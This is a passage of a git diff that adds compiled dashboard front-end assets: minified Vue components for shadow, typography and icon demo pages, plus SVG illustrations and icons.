||||
1
addons/dashboard/dist/assets/ShadowPage-fb617452.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as c}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js";import{_ as f}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as m,D as s,o as l,s as r,a as e,w as a,f as i,V as o,F as d,u as _,J as p,X as b,b as h,t as g}from"./index-dc96e1be.js";const v=m({__name:"ShadowPage",setup(w){const n=s({title:"Shadow Page"}),u=s([{title:"Utilities",disabled:!1,href:"#"},{title:"Shadow",disabled:!0,href:"#"}]);return(V,x)=>(l(),r(d,null,[e(c,{title:n.value.title,breadcrumbs:u.value},null,8,["title","breadcrumbs"]),e(o,null,{default:a(()=>[e(i,{cols:"12",md:"12"},{default:a(()=>[e(f,{title:"Basic Shadow"},{default:a(()=>[e(o,{justify:"center"},{default:a(()=>[(l(),r(d,null,_(25,t=>e(i,{key:t,cols:"auto"},{default:a(()=>[e(p,{height:"100",width:"100",class:b(["mb-5",["d-flex justify-center align-center bg-primary",`elevation-${t}`]])},{default:a(()=>[h("div",null,g(t-1),1)]),_:2},1032,["class"])]),_:2},1024)),64))]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{v as default};
|
||||
1
addons/dashboard/dist/assets/TablerIcons-3ae5dd43.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as o}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js";import{_ as n}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as c,D as a,o as i,s as m,a as e,w as t,f as d,b as f,V as _,F as u}from"./index-dc96e1be.js";const b=["innerHTML"],w=c({__name:"TablerIcons",setup(p){const s=a({title:"Tabler Icons"}),r=a('<iframe src="https://tablericons.com/" frameborder="0" width="100%" height="600"></iframe>'),l=a([{title:"Icons",disabled:!1,href:"#"},{title:"Tabler Icons",disabled:!0,href:"#"}]);return(h,T)=>(i(),m(u,null,[e(o,{title:s.value.title,breadcrumbs:l.value},null,8,["title","breadcrumbs"]),e(_,null,{default:t(()=>[e(d,{cols:"12",md:"12"},{default:t(()=>[e(n,{title:"Tabler Icons"},{default:t(()=>[f("div",{innerHTML:r.value},null,8,b)]),_:1})]),_:1})]),_:1})],64))}});export{w as default};
|
||||
1
addons/dashboard/dist/assets/TypographyPage-7d559339.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as m}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js";import{_ as v}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as f,o as i,c as g,w as e,a,a8 as y,K as b,e as w,t as d,A as C,L as V,a9 as L,J as _,D as o,s as h,f as k,b as t,F as x,u as B,X as H,V as T}from"./index-dc96e1be.js";const s=f({__name:"UiChildCard",props:{title:String},setup(r){const l=r;return(n,c)=>(i(),g(_,{variant:"outlined"},{default:e(()=>[a(y,{class:"py-3"},{default:e(()=>[a(b,{class:"text-h5"},{default:e(()=>[w(d(l.title),1)]),_:1})]),_:1}),a(C),a(V,null,{default:e(()=>[L(n.$slots,"default")]),_:3})]),_:3}))}}),D={class:"d-flex flex-column gap-1"},S={class:"text-caption pa-2 bg-lightprimary"},z=t("div",{class:"text-grey"},"Class",-1),N={class:"font-weight-medium"},$=t("div",null,[t("p",{class:"text-left"},"Left aligned on all viewport sizes."),t("p",{class:"text-center"},"Center aligned on all viewport sizes."),t("p",{class:"text-right"},"Right aligned on all viewport sizes."),t("p",{class:"text-sm-left"},"Left aligned on viewports SM (small) or wider."),t("p",{class:"text-right text-md-left"},"Left aligned on viewports MD (medium) or wider."),t("p",{class:"text-right text-lg-left"},"Left aligned on viewports LG (large) or wider."),t("p",{class:"text-right text-xl-left"},"Left aligned on viewports XL (extra-large) or wider.")],-1),M=t("div",{class:"d-flex justify-space-between flex-row"},[t("a",{href:"#",class:"text-decoration-none"},"Non-underlined link"),t("div",{class:"text-decoration-line-through"},"Line-through text"),t("div",{class:"text-decoration-overline"},"Overline text"),t("div",{class:"text-decoration-underline"},"Underline text")],-1),O=t("div",null,[t("p",{class:"text-high-emphasis"},"High-emphasis has an opacity of 87% in light theme and 100% in dark."),t("p",{class:"text-medium-emphasis"},"Medium-emphasis text and hint text have opacities of 60% in light theme and 70% in dark."),t("p",{class:"text-disabled"},"Disabled text has an opacity of 38% in light theme and 50% in dark.")],-1),j=f({__name:"TypographyPage",setup(r){const l=o({title:"Typography Page"}),n=o([["Heading 1","text-h1"],["Heading 2","text-h2"],["Heading 3","text-h3"],["Heading 4","text-h4"],["Heading 5","text-h5"],["Heading 6","text-h6"],["Subtitle 1","text-subtitle-1"],["Subtitle 2","text-subtitle-2"],["Body 1","text-body-1"],["Body 2","text-body-2"],["Button","text-button"],["Caption","text-caption"],["Overline","text-overline"]]),c=o([{title:"Utilities",disabled:!1,href:"#"},{title:"Typography",disabled:!0,href:"#"}]);return(U,F)=>(i(),h(x,null,[a(m,{title:l.value.title,breadcrumbs:c.value},null,8,["title","breadcrumbs"]),a(T,null,{default:e(()=>[a(k,{cols:"12",md:"12"},{default:e(()=>[a(v,{title:"Basic Typography"},{default:e(()=>[a(s,{title:"Heading"},{default:e(()=>[t("div",D,[(i(!0),h(x,null,B(n.value,([p,u])=>(i(),g(_,{variant:"outlined",key:p,class:"my-4"},{default:e(()=>[t("div",{class:H([u,"pa-2"])},d(p),3),t("div",S,[z,t("div",N,d(u),1)])]),_:2},1024))),128))])]),_:1}),a(s,{title:"Text-alignment",class:"mt-8"},{default:e(()=>[$]),_:1}),a(s,{title:"Decoration",class:"mt-8"},{default:e(()=>[M]),_:1}),a(s,{title:"Opacity",class:"mt-8"},{default:e(()=>[O]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{j as default};
|
||||
1
addons/dashboard/dist/assets/UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{x as n,o,c as i,w as e,a,a8 as d,b as c,K as u,e as p,t as _,a9 as s,A as f,L as V,J as m}from"./index-dc96e1be.js";const C={class:"d-sm-flex align-center justify-space-between"},h=n({__name:"UiParentCard",props:{title:String},setup(l){const r=l;return(t,x)=>(o(),i(m,{variant:"outlined",elevation:"0",class:"withbg"},{default:e(()=>[a(d,null,{default:e(()=>[c("div",C,[a(u,null,{default:e(()=>[p(_(r.title),1)]),_:1}),s(t.$slots,"action")])]),_:3}),a(f),a(V,null,{default:e(()=>[s(t.$slots,"default")]),_:3})]),_:3}))}});export{h as _};
|
||||
1
addons/dashboard/dist/assets/_plugin-vue_export-helper-c27b6911.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
const s=(t,r)=>{const o=t.__vccOpts||t;for(const[c,e]of r)o[c]=e;return o};export{s as _};
|
||||
34
addons/dashboard/dist/assets/img-error-bg-ab6474a0.svg
vendored
Normal file
@@ -0,0 +1,34 @@
|
||||
<svg width="676" height="391" viewBox="0 0 676 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<g opacity="0.09">
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 4.49127 197.53)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 342.315 387.578)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 28.0057 211.105)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 365.829 374.002)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 51.52 224.68)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 389.344 360.428)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 75.0345 238.255)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 412.858 346.852)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 98.5488 251.83)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 436.372 333.277)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 122.063 265.405)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 459.887 319.703)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 145.578 278.979)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 483.401 306.127)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 169.092 292.556)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 506.916 292.551)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 192.597 306.127)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 530.43 278.977)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 216.111 319.703)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 553.944 265.402)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 239.626 333.277)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 577.459 251.827)" stroke="black"/>
|
||||
<path d="M263.231 346.905L601.064 151.871" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 600.973 238.252)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 286.654 360.428)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 624.487 224.677)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 310.169 374.002)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 648.002 211.102)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 333.683 387.578)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 671.516 197.527)" stroke="black"/>
|
||||
</g>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 3.9 KiB |
43
addons/dashboard/dist/assets/img-error-blue-2675a7a9.svg
vendored
Normal file
@@ -0,0 +1,43 @@
|
||||
<svg width="676" height="395" viewBox="0 0 676 395" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<rect width="26.998" height="26.8293" transform="matrix(0.866041 -0.499972 0.866041 0.499972 361.873 290.126)" fill="#E3F2FD"/>
|
||||
<rect width="24.2748" height="24.1231" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364.249 291.115)" fill="#90CAF9"/>
|
||||
<rect width="26.998" height="26.8293" transform="matrix(0.866041 -0.499972 0.866041 0.499972 291.67 86.4912)" fill="#E3F2FD"/>
|
||||
<rect width="24.2748" height="24.1231" transform="matrix(0.866041 -0.499972 0.866041 0.499972 294.046 87.48)" fill="#90CAF9"/>
|
||||
<g filter="url(#filter0_d)">
|
||||
<path d="M370.694 211.828L365.394 208.768V215.835L365.404 215.829C365.459 216.281 365.785 216.724 366.383 217.069L417.03 246.308C418.347 247.068 420.481 247.068 421.798 246.308L468.671 219.248C469.374 218.842 469.702 218.301 469.654 217.77V210.861L464.282 213.962L418.024 187.257C416.708 186.497 414.573 186.497 413.257 187.257L370.694 211.828Z" fill="url(#paint0_linear)"/>
|
||||
</g>
|
||||
<rect width="59.6284" height="63.9858" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364 208.812)" fill="#90CAF9"/>
|
||||
<rect width="59.6284" height="63.9858" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364 208.812)" fill="url(#paint1_linear)"/>
|
||||
<rect width="56.6816" height="60.8238" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 366.645 208.761)" fill="url(#paint2_linear)"/>
|
||||
<path d="M421.238 206.161C421.238 206.434 421.62 206.655 422.092 206.655L432.159 206.656C435.164 206.656 437.6 208.063 437.601 209.798C437.602 211.533 435.166 212.939 432.162 212.938L422.09 212.937C421.62 212.937 421.24 213.157 421.24 213.428L421.241 215.814C421.241 216.087 421.624 216.308 422.096 216.308L432.689 216.309C438.917 216.31 443.967 213.395 443.965 209.799C443.964 206.202 438.914 203.286 432.684 203.286L422.086 203.284C421.617 203.284 421.236 203.504 421.237 203.775L421.238 206.161Z" fill="#1E88E5"/>
|
||||
<path d="M413.422 213.43C413.422 213.157 413.039 212.936 412.567 212.936L402.896 212.935C399.891 212.935 397.455 211.528 397.454 209.793C397.453 208.059 399.889 206.652 402.894 206.653L412.57 206.654C413.039 206.654 413.419 206.435 413.419 206.164L413.418 203.777C413.418 203.504 413.035 203.283 412.563 203.283L402.366 203.282C396.138 203.281 391.089 206.197 391.09 209.793C391.091 213.389 396.141 216.305 402.371 216.306L412.573 216.307C413.042 216.307 413.423 216.088 413.423 215.817L413.422 213.43Z" fill="#1E88E5"/>
|
||||
<path d="M407.999 198.145L411.211 201.235C411.266 201.288 411.332 201.336 411.405 201.379C411.813 201.614 412.461 201.669 412.979 201.49C413.59 201.278 413.787 200.821 413.421 200.469L410.209 197.379C409.843 197.027 409.051 196.913 408.441 197.124C407.831 197.335 407.633 197.793 407.999 198.145Z" fill="#1E88E5"/>
|
||||
<path d="M416.235 200.853C416.235 201.058 416.38 201.244 416.613 201.379C416.846 201.513 417.168 201.597 417.524 201.597C418.236 201.596 418.813 201.263 418.813 200.852L418.812 197.021C418.811 196.61 418.234 196.277 417.522 196.277C416.811 196.278 416.234 196.611 416.234 197.022L416.235 200.853Z" fill="#1E88E5"/>
|
||||
<path d="M421.627 200.47C421.317 200.769 421.412 201.143 421.82 201.379C421.893 201.421 421.977 201.459 422.069 201.491C422.68 201.703 423.472 201.588 423.838 201.236L427.047 198.147C427.413 197.794 427.215 197.337 426.605 197.126C425.994 196.915 425.203 197.029 424.836 197.381L421.627 200.47Z" fill="#1E88E5"/>
|
||||
<path d="M427.056 221.447L423.844 218.357C423.478 218.005 422.686 217.891 422.076 218.102C421.466 218.314 421.268 218.771 421.634 219.123L424.846 222.213C424.901 222.266 424.967 222.314 425.04 222.357C425.448 222.592 426.097 222.647 426.614 222.468C427.225 222.257 427.423 221.799 427.056 221.447Z" fill="#1E88E5"/>
|
||||
<path d="M418.82 218.739C418.82 218.328 418.243 217.995 417.531 217.995C416.819 217.995 416.242 218.329 416.242 218.74L416.243 222.57C416.244 222.776 416.388 222.962 416.621 223.096C416.854 223.231 417.177 223.314 417.533 223.314C418.245 223.314 418.822 222.981 418.821 222.57L418.82 218.739Z" fill="#1E88E5"/>
|
||||
<path d="M413.428 219.122C413.794 218.77 413.596 218.312 412.986 218.101C412.375 217.89 411.584 218.004 411.217 218.356L408.008 221.445C407.698 221.744 407.793 222.118 408.201 222.354C408.274 222.396 408.358 222.434 408.45 222.466C409.061 222.678 409.853 222.563 410.219 222.211L413.428 219.122Z" fill="#1E88E5"/>
|
||||
<defs>
|
||||
<filter id="filter0_d" x="301.394" y="186.687" width="232.264" height="208.191" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
|
||||
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
|
||||
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"/>
|
||||
<feOffset dy="84"/>
|
||||
<feGaussianBlur stdDeviation="32"/>
|
||||
<feColorMatrix type="matrix" values="0 0 0 0 0.129412 0 0 0 0 0.588235 0 0 0 0 0.952941 0 0 0 0.2 0"/>
|
||||
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow"/>
|
||||
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow" result="shape"/>
|
||||
</filter>
|
||||
<linearGradient id="paint0_linear" x1="417.526" y1="205.789" x2="365.394" y2="216.782" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#2196F3"/>
|
||||
<stop offset="1" stop-color="#B1DCFF"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="0.503035" y1="2.68177" x2="20.3032" y2="42.2842" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#FAFAFA" stop-opacity="0.74"/>
|
||||
<stop offset="1" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint2_linear" x1="-18.5494" y1="-44.8799" x2="14.7845" y2="40.5766" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#FAFAFA" stop-opacity="0.74"/>
|
||||
<stop offset="1" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 5.5 KiB |
42
addons/dashboard/dist/assets/img-error-purple-edee3fbc.svg
vendored
Normal file
@@ -0,0 +1,42 @@
|
||||
<svg width="710" height="391" viewBox="0 0 710 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<rect width="26.9258" height="26.7576" transform="matrix(0.866041 -0.499972 0.866041 0.499972 161.088 154.333)" fill="#EDE7F6"/>
|
||||
<rect width="24.9267" height="24.7709" transform="matrix(0.866041 -0.499972 0.866041 0.499972 162.809 155.327)" fill="#B39DDB"/>
|
||||
<rect width="26.9258" height="26.7576" transform="matrix(0.866041 -0.499972 0.866041 0.499972 536.744 181.299)" fill="#EDE7F6"/>
|
||||
<rect width="24.9267" height="24.7709" transform="matrix(0.866041 -0.499972 0.866041 0.499972 538.465 182.292)" fill="#B39DDB"/>
|
||||
<g filter="url(#filter0_d)">
|
||||
<path d="M67.7237 137.573V134.673H64.009V140.824L64.0177 140.829C64.0367 141.477 64.4743 142.121 65.3305 142.615L103.641 164.733C105.393 165.744 108.232 165.744 109.983 164.733L204.044 110.431C204.879 109.949 205.316 109.324 205.355 108.693L205.355 108.692V108.68C205.358 108.628 205.358 108.576 205.355 108.523L205.362 102.335L200.065 104.472L165.733 84.6523C163.982 83.6413 161.142 83.6413 159.391 84.6523L67.7237 137.573Z" fill="url(#paint0_linear)"/>
|
||||
</g>
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="url(#paint1_linear)" fill-opacity="0.3"/>
|
||||
<mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="64" y="78" width="141" height="81">
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
</mask>
|
||||
<g mask="url(#mask0)">
|
||||
</g>
|
||||
<mask id="mask1" mask-type="alpha" maskUnits="userSpaceOnUse" x="64" y="78" width="141" height="81">
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
</mask>
|
||||
<g mask="url(#mask1)">
|
||||
<rect width="64.3732" height="64.3732" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 111.303 81.6006)" fill="#5E35B1"/>
|
||||
<rect opacity="0.7" x="0.866041" width="63.3732" height="63.3732" rx="4.5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 79.1848 87.8305)" stroke="#5E35B1"/>
|
||||
</g>
|
||||
<defs>
|
||||
<filter id="filter0_d" x="0.0090332" y="83.894" width="269.353" height="229.597" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
|
||||
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
|
||||
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"/>
|
||||
<feOffset dy="84"/>
|
||||
<feGaussianBlur stdDeviation="32"/>
|
||||
<feColorMatrix type="matrix" values="0 0 0 0 0.403922 0 0 0 0 0.227451 0 0 0 0 0.717647 0 0 0 0.2 0"/>
|
||||
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow"/>
|
||||
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow" result="shape"/>
|
||||
</filter>
|
||||
<linearGradient id="paint0_linear" x1="200.346" y1="102.359" x2="71.0293" y2="158.071" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#A491C8"/>
|
||||
<stop offset="1" stop-color="#D7C5F8"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="8.1531" y1="-0.145767" x2="57.1962" y2="72.3003" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="white"/>
|
||||
<stop offset="1" stop-color="white" stop-opacity="0"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 3.3 KiB |
27
addons/dashboard/dist/assets/img-error-text-a6aebfa0.svg
vendored
Normal file
@@ -0,0 +1,27 @@
|
||||
<svg width="676" height="391" viewBox="0 0 676 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<path d="M267.744 237.142L279.699 230.24L300.636 242.329L288.682 249.231L313.566 263.598L286.344 279.314L261.46 264.947L215.984 291.203L197.779 282.558L169.334 211.758L169.092 211.618L196.313 195.902L267.744 237.142ZM219.359 265.077L240.523 252.859L204.445 232.029L205.487 234.589L219.359 265.077Z" fill="#FFAB91"/>
|
||||
<path d="M469.959 120.206L481.913 113.304L502.851 125.392L490.897 132.294L515.78 146.661L488.559 162.377L463.675 148.011L418.199 174.266L399.994 165.621L371.548 94.8211L371.307 94.6816L398.528 78.9654L469.959 120.206ZM421.574 148.141L442.737 135.922L406.66 115.093L407.701 117.653L421.574 148.141Z" fill="#FFAB91"/>
|
||||
<path d="M204.523 235.027V232.237L219.401 265.014L240.555 252.926V255.018L218.936 267.339L204.523 235.027Z" fill="#D84315"/>
|
||||
<path d="M406.738 118.09V115.301L421.616 148.078L442.77 135.99V138.082L421.151 150.402L406.738 118.09Z" fill="#D84315"/>
|
||||
<rect width="109.114" height="136.405" transform="matrix(0.866025 -0.5 0.866025 0.5 220.507 181.925)" fill="url(#paint0_linear)"/>
|
||||
<rect width="40.2357" height="70.0545" transform="matrix(0.866025 -0.5 0.866025 0.5 280.437 201.886)" fill="url(#paint1_linear)"/>
|
||||
<rect x="25.1147" width="80.1144" height="107.405" transform="matrix(0.866025 -0.5 0.866025 0.5 223.872 194.482)" stroke="#1565C0" stroke-width="29"/>
|
||||
<rect x="25.1147" width="80.1144" height="107.405" transform="matrix(0.866025 -0.5 0.866025 0.5 223.872 194.482)" stroke="url(#paint2_linear)" stroke-width="29"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" d="M279.517 230.177L267.662 237.15L196.064 195.772L168.866 211.58L169.331 212.097L170.096 214.002L196.436 198.795L267.866 240.035L279.821 233.133L298.211 243.751L300.787 242.265L279.517 230.177ZM291.278 250.695L288.804 252.124L311.1 264.996L313.805 263.418L291.278 250.695Z" fill="#D84315"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" d="M481.732 113.24L469.877 120.214L398.279 78.8359L371.081 94.6433L371.546 95.1603L372.311 97.0652L398.651 81.8581L470.081 123.099L482.036 116.196L500.426 126.814L503.002 125.328L481.732 113.24ZM493.493 133.759L491.019 135.187L513.315 148.06L516.02 146.482L493.493 133.759Z" fill="#D84315"/>
|
||||
<path d="M288.674 252.229V249.207L291.929 251.067L288.674 252.229Z" fill="#D84315"/>
|
||||
<defs>
|
||||
<linearGradient id="paint0_linear" x1="77.7511" y1="139.902" x2="-10.8629" y2="8.75671" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#3076C8"/>
|
||||
<stop offset="0.992076" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="25.8162" y1="51.0447" x2="68.7073" y2="-5.41524" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#2E75C7"/>
|
||||
<stop offset="1" stop-color="#4283CC"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint2_linear" x1="-16.1224" y1="-47.972" x2="123.494" y2="290.853" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="white"/>
|
||||
<stop offset="1" stop-color="white" stop-opacity="0"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 2.9 KiB |
5
addons/dashboard/dist/assets/index-0f1523f3.css
vendored
Normal file
720
addons/dashboard/dist/assets/index-dc96e1be.js
vendored
Normal file
BIN
addons/dashboard/dist/assets/materialdesignicons-webfont-67d24abe.eot
vendored
Normal file
BIN
addons/dashboard/dist/assets/materialdesignicons-webfont-80bb28b3.woff
vendored
Normal file
BIN
addons/dashboard/dist/assets/materialdesignicons-webfont-a58ecb54.ttf
vendored
Normal file
BIN
addons/dashboard/dist/assets/materialdesignicons-webfont-c1c004a9.woff2
vendored
Normal file
9
addons/dashboard/dist/assets/md5-45627dcb.js
vendored
Normal file
6
addons/dashboard/dist/assets/social-google-a359a253.svg
vendored
Normal file
@@ -0,0 +1,6 @@
|
||||
<svg width="22" height="22" viewBox="0 0 22 22" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<path d="M5.06129 13.2253L4.31871 15.9975L1.60458 16.0549C0.793457 14.5504 0.333374 12.8292 0.333374 11C0.333374 9.23119 0.763541 7.56319 1.52604 6.09448H1.52662L3.94296 6.53748L5.00146 8.93932C4.77992 9.58519 4.65917 10.2785 4.65917 11C4.65925 11.783 4.80108 12.5332 5.06129 13.2253Z" fill="#FBBB00"/>
|
||||
<path d="M21.4804 9.00732C21.6029 9.65257 21.6668 10.3189 21.6668 11C21.6668 11.7637 21.5865 12.5086 21.4335 13.2271C20.9143 15.6722 19.5575 17.8073 17.678 19.3182L17.6774 19.3177L14.6339 19.1624L14.2031 16.4734C15.4503 15.742 16.425 14.5974 16.9384 13.2271H11.2346V9.00732H17.0216H21.4804Z" fill="#518EF8"/>
|
||||
<path d="M17.6772 19.3176L17.6777 19.3182C15.8498 20.7875 13.5277 21.6666 11 21.6666C6.93783 21.6666 3.40612 19.3962 1.60449 16.0549L5.0612 13.2253C5.96199 15.6294 8.28112 17.3408 11 17.3408C12.1686 17.3408 13.2634 17.0249 14.2029 16.4734L17.6772 19.3176Z" fill="#28B446"/>
|
||||
<path d="M17.8085 2.78892L14.353 5.61792C13.3807 5.01017 12.2313 4.65908 11 4.65908C8.21963 4.65908 5.85713 6.44896 5.00146 8.93925L1.52658 6.09442H1.526C3.30125 2.67171 6.8775 0.333252 11 0.333252C13.5881 0.333252 15.9612 1.25517 17.8085 2.78892Z" fill="#F14336"/>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 1.2 KiB |
1
addons/dashboard/dist/favicon.svg
vendored
Normal file
@@ -0,0 +1 @@
|
||||
<svg t="1702013028016" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1541" width="200" height="200"><path d="M0 0m204.8 0l614.4 0q204.8 0 204.8 204.8l0 614.4q0 204.8-204.8 204.8l-614.4 0q-204.8 0-204.8-204.8l0-614.4q0-204.8 204.8-204.8Z" fill="#FFEC9C" p-id="1542"></path><path d="M819.2 0H534.272A756.48 756.48 0 0 0 0 483.584V819.2a204.8 204.8 0 0 0 204.8 204.8h614.4a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-204.8-204.8z" fill="#FFE98A" p-id="1543"></path><path d="M819.2 0h-3.84a755.2 755.2 0 0 0-539.392 1024H819.2a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-204.8-204.8z" fill="#FFE471" p-id="1544"></path><path d="M497.152 721.152A752.384 752.384 0 0 0 560.384 1024H819.2a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-89.088-168.96 755.2 755.2 0 0 0-437.76 685.312z" fill="#FFE161" p-id="1545"></path><path d="M526.08 140.032l98.304 199.168L844.8 371.2a15.616 15.616 0 0 1 8.704 25.6l-159.744 156.16 37.632 